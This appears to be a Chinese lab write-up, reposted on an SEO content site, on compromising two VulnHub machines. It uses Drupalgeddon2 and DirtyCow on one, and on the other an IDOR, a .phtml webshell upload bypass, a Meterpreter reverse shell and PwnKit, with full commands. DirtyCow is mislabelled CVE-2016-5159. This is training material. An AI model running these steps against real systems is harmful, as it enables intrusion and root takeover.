当前位置: 首页 > wzjs >正文

企业网站推广工具网站免费下载安装

wzjs 2025/8/22 1:55:16
企业网站推广工具,网站免费下载安装,湖南金辉建设集团有限公司网站,专业做书画推广的网站案例一dirtycow(CVE-2016-5159) 有个前置知识就是 获取liunx的内核 hostnamectl uname -a 然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多 也是需要使用辅助工具在本地进行辅助检测 然后去nomi-sec/PoC-in-GitHub: &#…

案例一dirtycow(CVE-2016-5159)

有个前置知识就是  获取liunx的内核

hostnamectl

uname -a

然后这个内核漏洞进行提权的步骤也是和手工win进行提权差不多   也是需要使用辅助工具在本地进行辅助检测  然后去nomi-sec/PoC-in-GitHub: 📡 从 GitHub 自动收集 PoC。⚠️ 小心恶意软件。

去找寻exp或者使用   msf本地的  梭哈模块去寻找利用的漏洞

run post/multi/recon/local_exploit_suggester

辅助检测工具:

单一的内核漏洞检测:https://github.com/The-Z-Labs/linux-exploit-suggester

综合型的工具:

https://github.com/diego-treitos/linux-smart-enumeration
我们把.sh文件上传到/usr/share 下
然后我们扫描一下我们的靶机
https://www.vulnhub.com/entry/lampiao-1,249/
靶机下载地址
信息收集扫描ip扫描
访问80端口发现没有信息访问1898
看到这个外星人图标就知道是内网渗透中经常出现的Drupal
这个最常见的利用就是框架漏洞
发现是低版本的php搭建的 所以直接进行利用
这里我直接使用第二个exp
使用use进行调用
查看利用的配置  
检查一下payload
设置上  rhost和rport
 
报这个标头就是进入了 后渗透模式  就是我们已经控制了对方的主机
查看用户权限
找好定位我们现在是在web权限上
输入shell获取对方的命令行
查看id是1000内的所以我们的目标是拿取root权限
需要使用漏洞 先上传检测文件
报了小脏牛漏洞  直接去github上找 nomi-sec/PoC-in-GitHub: 📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
利用的exp
exp上传  
上传之后把exp.c进行编译 
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

python -c 'import pty; pty.spawn("/bin/bash")' 
复现环境:https://www.vulnhub.com/entry/lampiao-1,249/
1、信息收集:
nmap -p1-65535 192.168.139.0/24
2、Web漏洞利用:
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
3、内核提权:
upload /root/linux-exploit-suggester.sh /tmp/1.sh
shell
cd /tmp
chmod +x 1.sh
./1.sh
https://github.com/gbonacini/CVE-2016-5195
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

案例二  pwnkit  

靶机下载https://www.vulnhub.com/entry/darkhole-1,724/

sudo arp-scan -l

先扫描内网的ip

开放了80 

这个漏洞是前端的一个逻辑越权漏洞 先注册一个账号

账号修改里出现这个id可能就是 代表的账户 

我们试一下改为1会不会直接修改admin的账号和密码

哥斯拉生成后门 使用绕过形式 改为 .phtml 进行绕过

后门上传成功

后门地点

http://192.168.248.136/upload/xxx.phtml

学个新操做   哥斯拉联动msf(在不使用msfvemon生成反弹shell的情况下)

命令:

71  use /exploits/multi/handler
72  ip a
73  set payload php/meterpreter/reverse_tcp
74  set lport 5566
75  history

先加载再go

接受到了shell   然后进行提权

上传检测脚本

这个就是我们要学的新漏洞

第一个方法就是使用本地漏扫工具

run post/multi/recon/local_exploit_suggester
二就是  使用search 搜索cve编号看看exp库中有没有利用的
提权成功
http://www.dtcms.com/wzjs/436652.html

相关文章:

  • 上海网站建设哪家好网络服务平台
  • 竞拍网站模板关键词推广营销
  • 互动网站案例在线识别图片找原图
  • 网站运营分析竞争对手今日要闻新闻
  • 有哪些免费的服务器沈阳百度seo排名优化软件
  • 谷歌俄语网站网站seo外链平台
  • 网站开发h5技术sem是什么意思啊
  • 织梦仿商城网站精品成品网站源码
  • wordpress文章摘要插件seo网站技术培训
  • 湘潭做网站选择磐石网络浙江seo
  • b2b2c网站开发广东省广州市白云区
  • 班级网站源代码下载seo怎么赚钱
  • 厦门网站建设外贸方象科技专注于什么领域
  • 手机下载视频网站模板网络营销推广的方法有哪些
  • 蚌埠网站制作哪里有今日时政新闻
  • 网站建设内容的重点优化培训内容
  • 网站宣传单模板做整站优化
  • 网站开网站开发设计公司广州最新发布最新
  • 企业网站制作服务可以打广告的平台
  • 境外社交网站上做推广国际军事最新消息今天
  • 网站排名优化怎么做长尾关键词是什么
  • 添加网站备案号链接企业网站制作要求
  • 湖寮做网站广告门
  • 企业销售网站建设百度做广告
  • 有没有专门做纸箱的网站新闻软文发布平台
  • 帮别人做彩票网站磁力引擎
  • 保定网络公司网站枣庄网站seo
  • 建设专业网站网络公司在百度怎么推广
  • 微信网站建设app公司福州百度首页优化
  • wordpress 隐藏顶部工具栏seo关键词排名软件